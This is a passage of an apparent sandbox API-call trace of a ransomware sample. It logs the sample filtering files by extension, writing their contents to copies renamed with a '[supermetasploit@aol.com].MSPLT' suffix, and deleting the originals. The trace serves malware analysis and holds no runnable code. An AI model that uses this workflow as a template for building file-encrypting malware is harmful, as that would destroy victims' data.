lstrlenW (lpString=".7z") returned 3 [0174.947] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0174.947] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0174.947] lstrlenW (lpString=".dbf") returned 4 [0174.947] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0174.947] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0174.947] lstrlenW (lpString=".1cd") returned 4 [0174.947] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0174.947] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0174.947] lstrlenW (lpString=".jpg") returned 4 [0174.947] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0174.947] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0174.947] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0174.947] lstrlenW (lpString=".doc") returned 4 [0174.947] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0174.947] lstrlenW (lpString=".docx") returned 5 [0174.947] lstrcmpiW (lpString1=".docx", lpString2="b.dat") returned -1 [0174.947] lstrlenW (lpString=".pdf") returned 4 [0174.947] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0174.947] lstrlenW (lpString=".xls") returned 4 [0174.947] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0174.947] lstrlenW (lpString=".xlsx") returned 5 [0174.947] lstrcmpiW (lpString1=".xlsx", lpString2="b.dat") returned -1 [0174.947] lstrlenW (lpString=".ppt") returned 4 [0174.947] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0174.947] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0174.947] lstrlenW (lpString=".zip") returned 4 [0174.947] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0174.947] lstrlenW (lpString=".rar") returned 4 [0174.947] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0174.947] lstrlenW (lpString=".bz2") returned 4 [0174.948] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0174.948] lstrlenW (lpString=".7z") returned 3 [0174.948] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0174.948] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0174.948] lstrlenW (lpString=".dbf") returned 4 [0174.948] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0174.948] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0174.948] lstrlenW (lpString=".1cd") returned 4 [0174.948] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0174.948] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0174.948] lstrlenW (lpString=".jpg") returned 4 [0174.948] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0174.948] lstrcmpiW (lpString1=".txt", lpString2=".MSPLT") returned 1 [0174.948] lstrlenW (lpString="README.txt") returned 10 [0174.948] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0174.949] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=46) returned 1 [0174.949] CloseHandle (hObject=0x2fc) returned 1 [0174.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt")) returned 0x20 [0174.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.950] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0174.950] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.950] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.950] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0174.950] GetLastError () returned 0x0 [0174.950] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x2e, lpOverlapped=0x0) returned 1 [0175.415] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x30, lpOverlapped=0x0) returned 1 [0175.416] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0175.416] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xe8, lpOverlapped=0x0) returned 1 [0175.416] SetEndOfFile (hFile=0x2f4) returned 1 [0175.416] CloseHandle (hObject=0x2f4) returned 1 [0175.418] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0175.418] SetEndOfFile (hFile=0x2fc) returned 1 [0175.419] CloseHandle (hObject=0x2fc) returned 1 [0175.419] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0175.419] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt")) returned 1 [0175.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0175.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0175.420] lstrlenW (lpString=".doc") returned 4 [0175.420] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0175.420] lstrlenW (lpString=".docx") returned 5 [0175.420] lstrcmpiW (lpString1=".docx", lpString2="E.txt") returned -1 [0175.420] lstrlenW (lpString=".pdf") returned 4 [0175.420] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0175.420] lstrlenW (lpString=".xls") returned 4 [0175.420] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0175.420] lstrlenW (lpString=".xlsx") returned 5 [0175.420] lstrcmpiW (lpString1=".xlsx", lpString2="E.txt") returned -1 [0175.420] lstrlenW (lpString=".ppt") returned 4 [0175.420] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0175.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0175.420] lstrlenW (lpString=".zip") returned 4 [0175.420] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0175.420] lstrlenW (lpString=".rar") returned 4 [0175.420] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0175.420] lstrlenW (lpString=".bz2") returned 4 [0175.420] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0175.420] lstrlenW (lpString=".7z") returned 3 [0175.420] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0175.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0175.420] lstrlenW (lpString=".dbf") returned 4 [0175.420] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0175.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0175.420] lstrlenW (lpString=".1cd") returned 4 [0175.420] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0175.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0175.420] lstrlenW (lpString=".jpg") returned 4 [0175.421] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0175.421] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0175.421] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0175.421] lstrlenW (lpString=".doc") returned 4 [0175.421] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0175.421] lstrlenW (lpString=".docx") returned 5 [0175.421] lstrcmpiW (lpString1=".docx", lpString2="E.txt") returned -1 [0175.421] lstrlenW (lpString=".pdf") returned 4 [0175.421] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0175.421] lstrlenW (lpString=".xls") returned 4 [0175.421] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0175.421] lstrlenW (lpString=".xlsx") returned 5 [0175.421] lstrcmpiW (lpString1=".xlsx", lpString2="E.txt") returned -1 [0175.421] lstrlenW (lpString=".ppt") returned 4 [0175.421] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0175.421] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0175.421] lstrlenW (lpString=".zip") returned 4 [0175.421] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0175.421] lstrlenW (lpString=".rar") returned 4 [0175.421] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0175.421] lstrlenW (lpString=".bz2") returned 4 [0175.421] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0175.421] lstrlenW (lpString=".7z") returned 3 [0175.421] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0175.421] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0175.421] lstrlenW (lpString=".dbf") returned 4 [0175.421] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0175.421] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0175.421] lstrlenW (lpString=".1cd") returned 4 [0175.421] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0175.421] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0175.421] lstrlenW (lpString=".jpg") returned 4 [0175.421] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0175.422] lstrcmpiW (lpString1=".VBS", lpString2=".MSPLT") returned 1 [0175.422] lstrlenW (lpString="OSPP.VBS") returned 8 [0175.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0175.422] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=94467) returned 1 [0175.422] CloseHandle (hObject=0x2fc) returned 1 [0175.422] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs")) returned 0x20 [0175.422] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0175.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0175.422] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0175.422] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0175.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0175.423] GetLastError () returned 0x0 [0175.423] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x17103, lpOverlapped=0x0) returned 1 [0175.427] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x17110, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x17110, lpOverlapped=0x0) returned 1 [0175.429] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0175.429] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xe4, lpOverlapped=0x0) returned 1 [0175.430] SetEndOfFile (hFile=0x2f4) returned 1 [0175.430] CloseHandle (hObject=0x2f4) returned 1 [0175.433] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0175.433] SetEndOfFile (hFile=0x2fc) returned 1 [0175.434] CloseHandle (hObject=0x2fc) returned 1 [0175.434] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0175.434] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs")) returned 1 [0175.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0175.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0175.435] lstrlenW (lpString=".doc") returned 4 [0175.435] lstrcmpiW (lpString1=".doc", lpString2=".VBS") returned -1 [0175.435] lstrlenW (lpString=".docx") returned 5 [0175.435] lstrcmpiW (lpString1=".docx", lpString2="P.VBS") returned -1 [0175.435] lstrlenW (lpString=".pdf") returned 4 [0175.435] lstrcmpiW (lpString1=".pdf", lpString2=".VBS") returned -1 [0175.435] lstrlenW (lpString=".xls") returned 4 [0175.435] lstrcmpiW (lpString1=".xls", lpString2=".VBS") returned 1 [0175.435] lstrlenW (lpString=".xlsx") returned 5 [0175.435] lstrcmpiW (lpString1=".xlsx", lpString2="P.VBS") returned -1 [0175.435] lstrlenW (lpString=".ppt") returned 4 [0175.435] lstrcmpiW (lpString1=".ppt", lpString2=".VBS") returned -1 [0175.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0175.435] lstrlenW (lpString=".zip") returned 4 [0175.435] lstrcmpiW (lpString1=".zip", lpString2=".VBS") returned 1 [0175.435] lstrlenW (lpString=".rar") returned 4 [0175.435] lstrcmpiW (lpString1=".rar", lpString2=".VBS") returned -1 [0175.435] lstrlenW (lpString=".bz2") returned 4 [0175.435] lstrcmpiW (lpString1=".bz2", lpString2=".VBS") returned -1 [0175.435] lstrlenW (lpString=".7z") returned 3 [0175.435] lstrcmpiW (lpString1=".7z", lpString2="VBS") returned -1 [0175.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0175.435] lstrlenW (lpString=".dbf") returned 4 [0175.435] lstrcmpiW (lpString1=".dbf", lpString2=".VBS") returned -1 [0175.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0175.435] lstrlenW (lpString=".1cd") returned 4 [0175.435] lstrcmpiW (lpString1=".1cd", lpString2=".VBS") returned -1 [0175.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0175.436] lstrlenW (lpString=".jpg") returned 4 [0175.436] lstrcmpiW (lpString1=".jpg", lpString2=".VBS") returned -1 [0175.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0175.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0175.436] lstrlenW (lpString=".doc") returned 4 [0175.436] lstrcmpiW (lpString1=".doc", lpString2=".VBS") returned -1 [0175.436] lstrlenW (lpString=".docx") returned 5 [0175.436] lstrcmpiW (lpString1=".docx", lpString2="P.VBS") returned -1 [0175.436] lstrlenW (lpString=".pdf") returned 4 [0175.436] lstrcmpiW (lpString1=".pdf", lpString2=".VBS") returned -1 [0175.436] lstrlenW (lpString=".xls") returned 4 [0175.436] lstrcmpiW (lpString1=".xls", lpString2=".VBS") returned 1 [0175.436] lstrlenW (lpString=".xlsx") returned 5 [0175.436] lstrcmpiW (lpString1=".xlsx", lpString2="P.VBS") returned -1 [0175.436] lstrlenW (lpString=".ppt") returned 4 [0175.436] lstrcmpiW (lpString1=".ppt", lpString2=".VBS") returned -1 [0175.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0175.436] lstrlenW (lpString=".zip") returned 4 [0175.436] lstrcmpiW (lpString1=".zip", lpString2=".VBS") returned 1 [0175.436] lstrlenW (lpString=".rar") returned 4 [0175.436] lstrcmpiW (lpString1=".rar", lpString2=".VBS") returned -1 [0175.436] lstrlenW (lpString=".bz2") returned 4 [0175.436] lstrcmpiW (lpString1=".bz2", lpString2=".VBS") returned -1 [0175.436] lstrlenW (lpString=".7z") returned 3 [0175.436] lstrcmpiW (lpString1=".7z", lpString2="VBS") returned -1 [0175.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0175.436] lstrlenW (lpString=".dbf") returned 4 [0175.436] lstrcmpiW (lpString1=".dbf", lpString2=".VBS") returned -1 [0175.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0175.436] lstrlenW (lpString=".1cd") returned 4 [0175.436] lstrcmpiW (lpString1=".1cd", lpString2=".VBS") returned -1 [0175.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0175.436] lstrlenW (lpString=".jpg") returned 4 [0175.436] lstrcmpiW (lpString1=".jpg", lpString2=".VBS") returned -1 [0175.437] lstrcmpiW (lpString1=".XML", lpString2=".MSPLT") returned 1 [0175.437] lstrlenW (lpString="SLERROR.XML") returned 11 [0175.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0175.437] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=36336) returned 1 [0175.437] CloseHandle (hObject=0x2fc) returned 1 [0175.437] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml")) returned 0x20 [0175.437] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0175.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0175.437] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0175.437] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0175.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0175.438] GetLastError () returned 0x0 [0175.438] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x8df0, lpOverlapped=0x0) returned 1 [0175.441] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x8e00, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x8e00, lpOverlapped=0x0) returned 1 [0175.442] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0175.443] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xea, lpOverlapped=0x0) returned 1 [0175.443] SetEndOfFile (hFile=0x2f4) returned 1 [0175.443] CloseHandle (hObject=0x2f4) returned 1 [0175.446] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0175.446] SetEndOfFile (hFile=0x2fc) returned 1 [0175.447] CloseHandle (hObject=0x2fc) returned 1 [0175.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0175.448] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml")) returned 1 [0175.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0175.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0175.448] lstrlenW (lpString=".doc") returned 4 [0175.448] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0175.448] lstrlenW (lpString=".docx") returned 5 [0175.448] lstrcmpiW (lpString1=".docx", lpString2="R.XML") returned -1 [0175.448] lstrlenW (lpString=".pdf") returned 4 [0175.448] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0175.448] lstrlenW (lpString=".xls") returned 4 [0175.448] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0175.448] lstrlenW (lpString=".xlsx") returned 5 [0175.448] lstrcmpiW (lpString1=".xlsx", lpString2="R.XML") returned -1 [0175.448] lstrlenW (lpString=".ppt") returned 4 [0175.448] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0175.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0175.449] lstrlenW (lpString=".zip") returned 4 [0175.449] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0175.449] lstrlenW (lpString=".rar") returned 4 [0175.449] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0175.449] lstrlenW (lpString=".bz2") returned 4 [0175.449] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0175.449] lstrlenW (lpString=".7z") returned 3 [0175.449] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0175.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0175.449] lstrlenW (lpString=".dbf") returned 4 [0175.449] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0175.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0175.449] lstrlenW (lpString=".1cd") returned 4 [0175.449] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0175.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0175.449] lstrlenW (lpString=".jpg") returned 4 [0175.449] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0175.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0175.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0175.854] lstrlenW (lpString=".doc") returned 4 [0175.854] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0175.854] lstrlenW (lpString=".docx") returned 5 [0175.854] lstrcmpiW (lpString1=".docx", lpString2="R.XML") returned -1 [0175.854] lstrlenW (lpString=".pdf") returned 4 [0175.854] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0175.854] lstrlenW (lpString=".xls") returned 4 [0175.854] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0175.854] lstrlenW (lpString=".xlsx") returned 5 [0175.854] lstrcmpiW (lpString1=".xlsx", lpString2="R.XML") returned -1 [0175.854] lstrlenW (lpString=".ppt") returned 4 [0175.854] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0175.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0175.854] lstrlenW (lpString=".zip") returned 4 [0175.854] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0175.854] lstrlenW (lpString=".rar") returned 4 [0175.854] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0175.854] lstrlenW (lpString=".bz2") returned 4 [0175.854] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0175.854] lstrlenW (lpString=".7z") returned 3 [0175.854] lstrcmpiW (lpString1=".7z", 